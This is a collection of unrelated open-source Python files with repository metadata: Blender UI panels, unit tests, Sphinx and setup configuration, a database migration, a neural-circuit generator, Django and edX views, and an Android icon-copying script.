XXX: put in menu? # TODO: this panel will soon be deprecated too class DATA_PT_ghost(ArmatureButtonsPanel, Panel): bl_label = "Ghost" def draw(self, context): layout = self.layout arm = context.armature layout.prop(arm, "ghost_type", expand=True) split = layout.split() col = split.column(align=True) if arm.ghost_type == 'RANGE': col.prop(arm, "ghost_frame_start", text="Start") col.prop(arm, "ghost_frame_end", text="End") col.prop(arm, "ghost_size", text="Step") elif arm.ghost_type == 'CURRENT_FRAME': col.prop(arm, "ghost_step", text="Range") col.prop(arm, "ghost_size", text="Step") col = split.column() col.label(text="Display:") col.prop(arm, "show_only_ghost_selected", text="Selected Only") class DATA_PT_iksolver_itasc(ArmatureButtonsPanel, Panel): bl_label = "Inverse Kinematics" bl_options = {'DEFAULT_CLOSED'} @classmethod def poll(cls, context): ob = context.object return (ob and ob.pose) def draw(self, context): layout = self.layout ob = context.object itasc = ob.pose.ik_param layout.prop(ob.pose, "ik_solver") if itasc: layout.prop(itasc, "mode", expand=True) simulation = (itasc.mode == 'SIMULATION') if simulation: layout.label(text="Reiteration:") layout.prop(itasc, "reiteration_method", expand=True) row = layout.row() row.active = not simulation or itasc.reiteration_method != 'NEVER' row.prop(itasc, "precision") row.prop(itasc, "iterations") if simulation: layout.prop(itasc, "use_auto_step") row = layout.row() if itasc.use_auto_step: row.prop(itasc, "step_min", text="Min") row.prop(itasc, "step_max", text="Max") else: row.prop(itasc, "step_count") layout.prop(itasc, "solver") if simulation: layout.prop(itasc, "feedback") layout.prop(itasc, "velocity_max") if itasc.solver == 'DLS': row = layout.row() row.prop(itasc, "damping_max", text="Damp", slider=True) row.prop(itasc, "damping_epsilon", text="Eps", slider=True) from bl_ui.properties_animviz import ( MotionPathButtonsPanel, OnionSkinButtonsPanel, ) class DATA_PT_motion_paths(MotionPathButtonsPanel, Panel): #bl_label = "Bones Motion Paths" bl_context = "data" @classmethod def poll(cls, context): # XXX: include pose-mode check? return (context.object) and (context.armature) def draw(self, context): # layout = self.layout ob = context.object avs = ob.pose.animation_visualization pchan = context.active_pose_bone mpath = pchan.motion_path if pchan else None self.draw_settings(context, avs, mpath, bones=True) class DATA_PT_onion_skinning(OnionSkinButtonsPanel): # , Panel): # inherit from panel when ready #bl_label = "Bones Onion Skinning" bl_context = "data" @classmethod def poll(cls, context): # XXX: include pose-mode check? return (context.object) and (context.armature) def draw(self, context): ob = context.object self.draw_settings(context, ob.pose.animation_visualization, bones=True) class DATA_PT_custom_props_arm(ArmatureButtonsPanel, PropertyPanel, Panel): COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_GAME'} _context_path = "object.data" _property_type = bpy.types.Armature if __name__ == "__main__": # only for live edit. bpy.utils.register_module(__name__)
PLyczkowski/Sticky-Keymap
2.74/scripts/startup/bl_ui/properties_data_armature.py
Python
gpl-2.0
10,538
0.001803
# Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from ._exceptions import ( UnificationAmbiguousException, UnificationFailedException, CanonicalizationFailedException) from ._strategy import ( UnificationStrategy, UnificationStrategyForCanonicalization, TupleExpansion) from ._unification import unify from ._canonicalization import canonicalize
google/tmppy
_py2tmp/unification/__init__.py
Python
apache-2.0
920
0
__author__ = 'Dominic Miglar <dominic.miglar@bitmovin.net>' import unittest from bitcodin import create_input from bitcodin import Input from bitcodin.exceptions import BitcodinBadRequestError from bitcodin.test.bitcodin_test_case import BitcodinTestCase class CreateInputIncompleteDataTestCase(BitcodinTestCase): def setUp(self): super(CreateInputIncompleteDataTestCase, self).setUp() self.inputUrl = '' def runTest(self): input = Input(self.inputUrl) with self.assertRaises(BitcodinBadRequestError): result = create_input(input) def tearDown(self): super(CreateInputIncompleteDataTestCase, self).tearDown() if __name__ == '__main__': unittest.main()
bitmovin/bitcodin-python
bitcodin/test/input/testcase_create_input_incomplete_data.py
Python
unlicense
727
0
#!/usr/bin/env python # -*- coding: utf-8 -*- # # complexity documentation build configuration file, created by # sphinx-quickstart on Tue Jul 9 22:26:36 2013. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os # If extensions (or modules to document with autodoc) are in another # directory, add these directories to sys.path here. If the directory is # relative to the documentation root, use os.path.abspath to make it # absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) # Get the project root dir, which is the parent dir of this cwd = os.getcwd() project_root = os.path.dirname(cwd) # Insert the project root dir as the first element in the PYTHONPATH. # This lets us ensure that the source package is imported, and that its # version is used. sys.path.insert(0, project_root) import pybozocrack # -- General configuration --------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'PyBozoCrack' copyright = u'2014, Henrique Pereira' # The version info for the project you're documenting, acts as replacement # for |version| and |release|, also used in various other places throughout # the built documents. # # The short X.Y version. version = pybozocrack.__version__ # The full version, including alpha/beta/rc tags. release = pybozocrack.__version__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to # some non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built # documents. #keep_warnings = False # -- Options for HTML output ------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'default' # Theme options are theme-specific and customize the look and feel of a # theme further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as # html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the # top of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon # of the docs. This file should be a Windows icon file (.ico) being # 16x16 or 32x32 pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) # here, relative to this directory. They are copied after the builtin # static files, so a file named "default.css" will overwrite the builtin # "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names # to template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. # Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. # Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages # will contain a <link> tag referring to it. The value of this option # must be the base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'pybozocrackdoc' # -- Options for LaTeX output ------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto/manual]). latex_documents = [ ('index', 'pybozocrack.tex', u'PyBozoCrack Documentation', u'Henrique Pereira', 'manual'), ] # The name of an image file (relative to this directory) to place at # the top of the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings # are parts, not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output ------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'pybozocrack', u'PyBozoCrack Documentation', [u'Henrique Pereira'], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ---------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ('index', 'pybozocrack', u'PyBozoCrack Documentation', u'Henrique Pereira', 'pybozocrack', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False
ikkebr/PyBozoCrack
docs/conf.py
Python
bsd-3-clause
8,453
0.005442
# -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2016-2018 CERN. # # Invenio is free software; you can redistribute it and/or modify it # under the terms of the MIT License; see LICENSE file for more details. """Create oauthclient tables.""" import sqlalchemy as sa import sqlalchemy_utils from alembic import op from sqlalchemy.engine.reflection import Inspector # revision identifiers, used by Alembic. revision = '97bbc733896c' down_revision = '44ab9963e8cf' branch_labels = () depends_on = '9848d0149abd' def upgrade(): """Upgrade database.""" op.create_table( 'oauthclient_remoteaccount', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=False), sa.Column('client_id', sa.String(length=255), nullable=False), sa.Column( 'extra_data', sqlalchemy_utils.JSONType(), nullable=False), sa.ForeignKeyConstraint(['user_id'], [u'accounts_user.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('user_id', 'client_id') ) op.create_table( 'oauthclient_useridentity', sa.Column('id', sa.String(length=255), nullable=False), sa.Column('method', sa.String(length=255), nullable=False), sa.Column('id_user', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['id_user'], [u'accounts_user.id'], ), sa.PrimaryKeyConstraint('id', 'method') ) op.create_index( 'useridentity_id_user_method', 'oauthclient_useridentity', ['id_user', 'method'], unique=True ) op.create_table( 'oauthclient_remotetoken', sa.Column('id_remote_account', sa.Integer(), nullable=False), sa.Column('token_type', sa.String(length=40), nullable=False), sa.Column( 'access_token', sqlalchemy_utils.EncryptedType(), nullable=False), sa.Column('secret', sa.Text(), nullable=False), sa.ForeignKeyConstraint( ['id_remote_account'], [u'oauthclient_remoteaccount.id'], name='fk_oauthclient_remote_token_remote_account' ), sa.PrimaryKeyConstraint('id_remote_account', 'token_type') ) def downgrade(): """Downgrade database.""" ctx = op.get_context() insp = Inspector.from_engine(ctx.connection.engine) op.drop_table('oauthclient_remotetoken') for fk in insp.get_foreign_keys('oauthclient_useridentity'): if fk['referred_table'] == 'accounts_user': op.drop_constraint( op.f(fk['name']), 'oauthclient_useridentity', type_='foreignkey' ) op.drop_index( 'useridentity_id_user_method', table_name='oauthclient_useridentity') op.drop_table('oauthclient_useridentity') op.drop_table('oauthclient_remoteaccount')
tiborsimko/invenio-oauthclient
invenio_oauthclient/alembic/97bbc733896c_create_oauthclient_tables.py
Python
mit
2,898
0
#!/usr/bin/env python """ Create generic LPU and simple pulse input signal. """ from itertools import product import sys import numpy as np import h5py import networkx as nx def create_lpu_graph(lpu_name, N_sensory, N_local, N_proj): """ Create a generic LPU graph. Creates a graph containing the neuron and synapse parameters for an LPU containing the specified number of local and projection neurons. The graph also contains the parameters for a set of sensory neurons that accept external input. All neurons are either spiking or graded potential neurons; the Leaky Integrate-and-Fire model is used for the former, while the Morris-Lecar model is used for the latter (i.e., the neuron's membrane potential is deemed to be its output rather than the time when it emits an action potential). Synapses use either the alpha function model or a conductance-based model. Parameters ---------- lpu_name : str Name of LPU. Used in port identifiers. N_sensory : int Number of sensory neurons. N_local : int Number of local neurons. N_proj : int Number of project neurons. Returns ------- g : networkx.MultiDiGraph Generated graph. """ # Set numbers of neurons: neu_type = ('sensory', 'local', 'proj') neu_num = (N_sensory, N_local, N_proj) # Neuron ids are between 0 and the total number of neurons: G = nx.MultiDiGraph() in_port_idx = 0 spk_out_id = 0 gpot_out_id = 0 for (t, n) in zip(neu_type, neu_num): for i in range(n): id = t+"_"+str(i) name = t+"_"+str(i) # Half of the sensory neurons and projection neurons are # spiking neurons. The other half are graded potential neurons. # All local neurons are graded potential only. if t != 'local' and np.random.rand() < 0.5: G.add_node(id, {'class': 'LeakyIAF', 'name': name+'_s', 'initV': np.random.uniform(-60.0,-25.0), 'reset_potential': -67.5489770451, 'resting_potential': 0.0, 'threshold': -25.1355161007, 'resistance': 1002.445570216, 'capacitance': 0.0669810502993, 'circuit': 'proj' if t == 'proj' else 'local' }) # Projection neurons are all assumed to be attached to output # ports (which are represented as separate nodes): if t == 'proj': G.add_node(id+'_port', {'class': 'Port', 'name': name+'port', 'port_type': 'spike', 'port_io': 'out', 'selector': '/%s/out/spk/%s' % (lpu_name, str(spk_out_id)) }) G.add_edge(id, id+'_port') spk_out_id += 1 else: # An input port node is created for and attached to each non-projection # neuron with a synapse; this assumes that data propagates from one LPU to # another as follows: # LPU0[projection neuron] -> LPU0[output port] -> LPU1[input port] -> # LPU1[synapse] -> LPU1[non-projection neuron] G.add_node('in_port'+str(in_port_idx), {'class': 'Port', 'name': 'in_port'+str(in_port_idx), 'port_type': 'spike', 'port_io': 'in', 'selector': '/%s/in/spk/%s' % (lpu_name, in_port_idx) }) G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, {'class': 'AlphaSynapse', 'name': 'in_port'+str(in_port_idx)+'-'+name, 'ad': 0.19*1000, 'ar': 1.1*100, 'gmax': 0.003*1e-3, 'reverse': 65.0, 'circuit': 'local' }) G.add_edge('in_port'+str(in_port_idx), 'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id) G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, id) in_port_idx += 1 else: G.add_node(id, {'class': "MorrisLecar", 'name': name+'_g', 'V1': 30., 'V2': 15., 'V3': 0., 'V4': 30., 'phi': 0.025, 'offset': 0., 'V_L': -50., 'V_Ca': 100.0, 'V_K': -70.0, 'g_Ca': 1.1, 'g_K': 2.0, 'g_L': 0.5, 'initV': -52.14, 'initn': 0.02, 'circuit': 'proj' if t == 'proj' else 'local' }) # Projection neurons are all assumed to be attached to output # ports (which are not represented as separate nodes): if t == 'proj': G.add_node(id+'_port', {'class': 'Port', 'name': name+'port', 'port_type': 'gpot', 'port_io': 'out', 'selector': '/%s/out/gpot/%s' % (lpu_name, str(gpot_out_id)) }) G.add_edge(id, id+'_port') gpot_out_id += 1 else: G.add_node('in_port'+str(in_port_idx), {'class': 'Port', 'name': 'in_port'+str(in_port_idx), 'port_type': 'gpot', 'port_io': 'in', 'selector': '/%s/in/gpot/%s' % (lpu_name, in_port_idx) }) G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, {'class': 'PowerGPotGPot', 'name': 'in_port'+str(in_port_idx)+'-'+name, 'reverse': -80.0, 'saturation': 0.03*1e-3, 'slope': 0.8*1e-6, 'power': 1.0, 'threshold': -50.0, 'circuit': 'local' }) G.add_edge('in_port'+str(in_port_idx), 'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, delay = 0.001) G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, id) in_port_idx += 1 # Assume a probability of synapse existence for each group of synapses: # sensory -> local, sensory -> projection, local -> projection, # projection -> local: for r, (i, j) in zip((0.5, 0.1, 0.1, 0.3), ((0, 1), (0, 2), (1, 2), (2, 1))): for src, tar in product(range(neu_num[i]), range(neu_num[j])): # Don't connect all neurons: if np.random.rand() > r: continue # Connections from the sensory neurons use the alpha function model; # all other connections use the power_gpot_gpot model: pre_id = neu_type[i]+"_"+str(src) post_id = neu_type[j]+"_"+str(tar) name = G.node[pre_id]['name'] + '-' + G.node[post_id]['name'] synapse_id = 'synapse_' + name if G.node[pre_id]['class'] is 'LeakyIAF': G.add_node(synapse_id, {'class' : 'AlphaSynapse', 'name' : name, 'ar' : 1.1*1e2, 'ad' : 1.9*1e3, 'reverse' : 65.0 if G.node[post_id]['class'] is 'LeakyIAF' else 10.0, 'gmax' : 3*1e-6 if G.node[post_id]['class'] is 'LeakyIAF' else 3.1e-7, 'circuit' : 'local'}) G.add_edge(pre_id, synapse_id) G.add_edge(synapse_id, post_id) else: G.add_node(synapse_id, {'class' : 'PowerGPotGPot', 'name' : name, 'slope' : 0.8*1e-6, 'threshold' : -50.0, 'power' : 1.0, 'saturation' : 0.03*1e-3, 'reverse' : -100.0, 'circuit' : 'local'}) G.add_edge(pre_id, synapse_id, delay = 0.001) G.add_edge(synapse_id, post_id) return G def create_lpu(file_name, lpu_name, N_sensory, N_local, N_proj): """ Create a generic LPU graph. Creates a GEXF file containing the neuron and synapse parameters for an LPU containing the specified number of local and projection neurons. The GEXF file also contains the parameters for a set of sensory neurons that accept external input. All neurons are either spiking or graded potential neurons; the Leaky Integrate-and-Fire model is used for the former, while the Morris-Lecar model is used for the latter (i.e., the neuron's membrane potential is deemed to be its output rather than the time when it emits an action potential). Synapses use either the alpha function model or a conductance-based model. Parameters ---------- file_name : str Output GEXF file name. lpu_name : str Name of LPU. Used in port identifiers. N_sensory : int Number of sensory neurons. N_local : int Number of local neurons. N_proj : int Number of project neurons. Returns ------- g : networkx.MultiDiGraph Generated graph. """ g = create_lpu_graph(lpu_name, N_sensory, N_local, N_proj) nx.write_gexf(g, file_name) def create_input(file_name, N_sensory, dt=1e-4, dur=1.0, start=0.3, stop=0.6, I_max=0.6): """ Create input stimulus for sensory neurons in artificial LPU. Creates an HDF5 file containing input signals for the specified number of neurons. The signals consist of a rectangular pulse of specified duration and magnitude. Parameters ---------- file_name : str Name of output HDF5 file. g: networkx.MultiDiGraph NetworkX graph object representing the LPU dt : float Time resolution of generated signal. dur : float Duration of generated signal. start : float Start time of signal pulse. stop : float Stop time of signal pulse. I_max : float Pulse magnitude. """ Nt = int(dur/dt) t = np.arange(0, dt*Nt, dt) uids = ["sensory_"+str(i) for i in range(N_sensory)] uids = np.array(uids) I = np.zeros((Nt, N_sensory), dtype=np.float64) I[np.logical_and(t>start, t<stop)] = I_max with h5py.File(file_name, 'w') as f: f.create_dataset('I/uids', data=uids) f.create_dataset('I/data', (Nt, N_sensory), dtype=np.float64, data=I) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('lpu_file_name', nargs='?', default='generic_lpu.gexf.gz', help='LPU file name') parser.add_argument('in_file_name', nargs='?', default='generic_input.h5', help='Input file name') parser.add_argument('-s', type=int, help='Seed random number generator') parser.add_argument('-l', '--lpu', type=str, default='gen', help='LPU name') args = parser.parse_args() if args.s is not None: np.random.seed(args.s) dt = 1e-4 dur = 1.0 start = 0.3 stop = 0.6 I_max = 0.6 neu_num = [np.random.randint(31, 40) for i in xrange(3)] create_lpu(args.lpu_file_name, args.lpu, *neu_num) g = nx.read_gexf(args.lpu_file_name) create_input(args.in_file_name, neu_num[0], dt, dur, start, stop, I_max) create_lpu(args.lpu_file_name, args.lpu, *neu_num)
AdamRTomkins/Neurokernel-singularity-container
examples/data/gen_generic_lpu.py
Python
apache-2.0
12,988
0.004312
from django.conf.urls.defaults import patterns, url, include urlpatterns = patterns('professor.views', url(r'^$', 'home', name='home'), url(r'^adicionar-compromisso$', 'adicionarCompromisso', name='adicionarCompromisso'), url(r'^visualizar-compromisso/(?P<id>\d{1,10})$', 'visualizarCompromisso', name='visualizarCompromisso'), url(r'^editar-compromisso/(?P<id>\d{1,10})$', 'editarCompromisso', name='editarCompromisso'), url(r'^excluir-compromisso/(?P<id>\d{1,10})$', 'excluirCompromisso', name='excluirCompromisso'), url(r'^get-compromissos$', 'getCompromissos', name='getCompromissos'), url(r'^disponibilidadeAula$', 'disponibilidadeAula', name='disponibilidadeAula'), url(r'^informarInteresseDisciplina$', 'informarInteresseDisciplina', name='informarInteresseDisciplina'), url(r'^getInteressesDisciplina$', 'getInteressesDisciplina', name='getInteressesDisciplina'), url(r'^getDisponibilidadeAula$', 'getDisponibilidadeAula', name='getDisponibilidadeAula'), )
dextervip/rpv
GerenDisponibilidade/professor/urls.py
Python
gpl-3.0
1,015
0.009852
from distutils.core import setup from setuptools import find_packages setup(name='ddns_updater_aws', version='0.1', author='Felix Bouliane', license='MIT', py_modules=[], packages=find_packages(exclude=['contrib', 'docs', 'test']), url='https://github.com/fbouliane/ddns-updater-aws', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 2.7', 'Topic :: Internet', 'Topic :: Internet :: Name Service (DNS)' ], keywords='DNS, Dynamic DNS, fixed ip, route53, AWS, Amazon Web Services', install_requires=[ 'dnspython>=1.12.0,<2.0', 'ipaddress>=1.0.16,<2.0', 'route53>=1.0,<2.0', 'configparser>=3.3,<4.0' ], entry_points={ 'console_scripts': [ 'ddns-updater-aws = ddns_updater_aws.__main__:main', ] } )
fbouliane/ddns-updater-aws
setup.py
Python
mit
1,053
0
# Copyright 2013 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for volume name_id.""" from oslo.config import cfg from cinder import context from cinder import db from cinder import test from cinder.tests import utils as testutils CONF = cfg.CONF class NameIDsTestCase(test.TestCase): """Test cases for naming volumes with name_id.""" def setUp(self): super(NameIDsTestCase, self).setUp() self.ctxt = context.RequestContext(user_id='user_id', project_id='project_id') def tearDown(self): super(NameIDsTestCase, self).tearDown() def test_name_id_same(self): """New volume should have same 'id' and 'name_id'.""" vol_ref = testutils.create_volume(self.ctxt, size=1) self.assertEqual(vol_ref['name_id'], vol_ref['id']) expected_name = CONF.volume_name_template % vol_ref['id'] self.assertEqual(vol_ref['name'], expected_name) def test_name_id_diff(self): """Change name ID to mimic volume after migration.""" vol_ref = testutils.create_volume(self.ctxt, size=1) db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'}) vol_ref = db.volume_get(self.ctxt, vol_ref['id']) expected_name = CONF.volume_name_template % 'fake' self.assertEqual(vol_ref['name'], expected_name) def test_name_id_snapshot_volume_name(self): """Make sure snapshot['volume_name'] is updated.""" vol_ref = testutils.create_volume(self.ctxt, size=1) db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'}) snap_ref = testutils.create_snapshot(self.ctxt, vol_ref['id']) expected_name = CONF.volume_name_template % 'fake' self.assertEqual(snap_ref['volume_name'], expected_name)
rickerc/cinder_audit
cinder/tests/db/test_name_id.py
Python
apache-2.0
2,344
0
""" View endpoints for Survey """ import logging import json from django.contrib.auth.decorators import login_required from django.http import ( HttpResponse, HttpResponseRedirect, HttpResponseNotFound ) from django.core.urlresolvers import reverse from django.views.decorators.http import require_POST from django.conf import settings from django.utils.html import escape from opaque_keys.edx.keys import CourseKey from edxmako.shortcuts import render_to_response from survey.models import SurveyForm from microsite_configuration import microsite log = logging.getLogger("edx.survey") @login_required def view_survey(request, survey_name): """ View to render the survey to the end user """ redirect_url = request.GET.get('redirect_url') return view_student_survey(request.user, survey_name, redirect_url=redirect_url) def view_student_survey(user, survey_name, course=None, redirect_url=None, is_required=False, skip_redirect_url=None): """ Shared utility method to render a survey form NOTE: This method is shared between the Survey and Courseware Djangoapps """ redirect_url = redirect_url if redirect_url else reverse('dashboard') dashboard_redirect_url = reverse('dashboard') skip_redirect_url = skip_redirect_url if skip_redirect_url else dashboard_redirect_url survey = SurveyForm.get(survey_name, throw_if_not_found=False) if not survey: return HttpResponseRedirect(redirect_url) # the result set from get_answers, has an outer key with the user_id # just remove that outer key to make the JSON payload simplier existing_answers = survey.get_answers(user=user).get(user.id, {}) platform_name = microsite.get_value('platform_name', settings.PLATFORM_NAME) context = { 'existing_data_json': json.dumps(existing_answers), 'postback_url': reverse('submit_answers', args=[survey_name]), 'redirect_url': redirect_url, 'skip_redirect_url': skip_redirect_url, 'dashboard_redirect_url': dashboard_redirect_url, 'survey_form': survey.form, 'is_required': is_required, 'mail_to_link': microsite.get_value('email_from_address', settings.CONTACT_EMAIL), 'platform_name': platform_name, 'course': course, } return render_to_response("survey/survey.html", context) @require_POST @login_required def submit_answers(request, survey_name): """ Form submission post-back endpoint. NOTE: We do not have a formal definition of a Survey Form, it's just some authored HTML form fields (via Django Admin site). Therefore we do not do any validation of the submission server side. It is assumed that all validation is done via JavaScript in the survey.html file """ survey = SurveyForm.get(survey_name, throw_if_not_found=False) if not survey: return HttpResponseNotFound() answers = {} for key in request.POST.keys(): # support multi-SELECT form values, by string concatenating them with a comma separator array_val = request.POST.getlist(key) answers[key] = request.POST[key] if len(array_val) == 0 else ','.join(array_val) # the URL we are supposed to redirect to is # in a hidden form field redirect_url = answers['_redirect_url'] if '_redirect_url' in answers else reverse('dashboard') course_key = CourseKey.from_string(answers['course_id']) if 'course_id' in answers else None allowed_field_names = survey.get_field_names() # scrub the answers to make sure nothing malicious from the user gets stored in # our database, e.g. JavaScript filtered_answers = {} for answer_key in answers.keys(): # only allow known input fields if answer_key in allowed_field_names: filtered_answers[answer_key] = escape(answers[answer_key]) survey.save_user_answers(request.user, filtered_answers, course_key) response_params = json.dumps({ # The HTTP end-point for the payment processor. "redirect_url": redirect_url, }) return HttpResponse(response_params, content_type="text/json")
xingyepei/edx-platform
lms/djangoapps/survey/views.py
Python
agpl-3.0
4,127
0.002908
from __future__ import absolute_import from agms.exception.not_found_exception import NotFoundException try: import requests except ImportError as e: raise NotFoundException(e) class RequestsClient(object): def http_do(self, http_verb, url, headers, request_body): response = requests.request( http_verb, url, headers=headers, data=request_body, verify=True ) return [response.status_code, response.text]
agmscode/agms_python
agms/util/requests_client.py
Python
mit
509
0.001965
#!/usr/bin/env python """Small tool for copying android icons from material-design-icons repo to specified android gradle module. It copies all density versions of png files to appropriate res subdirectories. Usage: picon.py add <category> <name> [-i <path>] [-o <path>] [-c <color>] [-s <size>] picon.py rem <name> [-o <path>] [-c <color>] [-s <size>] picon.py (-h | --help) picon.py (-v | --version) Options: -c, --color <color> Which color version to use (black or white or all) [default: all] -s, --size <size> Which size to use (number in dp units or 'all') [default: all] -i, --input <path> Path where local copy of material-design-icons repo is located [default: /media/data/android_big/material-design-icons] -o, --output <path> Path of top android module directory where icons will be copied [default: /home/marek/code/android/MyBlocks/myres] -h, --help Show help screen. -v, --version Show version. Commands: add: copy new icon from material-design-icons repo to android module rem: remove all versions of given icon from android module """ VERSION='0.1.0' try: from docopt import docopt except ImportError: print 'This script needs a "docopt" module (http://docopt.org)' raise from shutil import copyfile from os import remove from os import mkdir from os.path import join from os.path import isdir densities = [ "mdpi", "hdpi", "xhdpi", "xxhdpi", "xxxhdpi", ] def add(category, name, color, size, inp, outp): if color == "all": add(category, name, "black", size, inp, outp) add(category, name, "white", size, inp, outp) return if size == "all": add(category, name, color, "18", inp, outp) add(category, name, color, "24", inp, outp) add(category, name, color, "36", inp, outp) add(category, name, color, "48", inp, outp) return name = name + "_" + color + "_" + size + "dp.png" for density in densities: idir = join(inp, category, "drawable-" + density) odir = join(outp, "src", "main", "res", "drawable-" + density) if not isdir(odir): mkdir(odir) copyfile(join(idir, name), join(odir, name)) def rem(name, color, size, outp): if color == "all": rem(name, "black", size, outp) rem(name, "white", size, outp) return if size == "all": rem(name, color, "18", outp) rem(name, color, "24", outp) rem(name, color, "36", outp) rem(name, color, "48", outp) return name = name + "_" + color + "_" + size + "dp.png" for density in densities: ofile = join(outp, "src", "main", "res", "drawable-" + density, name) try: remove(ofile) except OSError: print "Can not remove:", ofile def main(): argdict = docopt(__doc__, version=VERSION) if argdict["add"]: add(argdict["<category>"], argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--input"], argdict["--output"]) elif argdict["rem"]: rem(argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--output"]) if __name__ == '__main__': main()
langara/MyBlocks
picon.py
Python
apache-2.0
3,366
0.007427
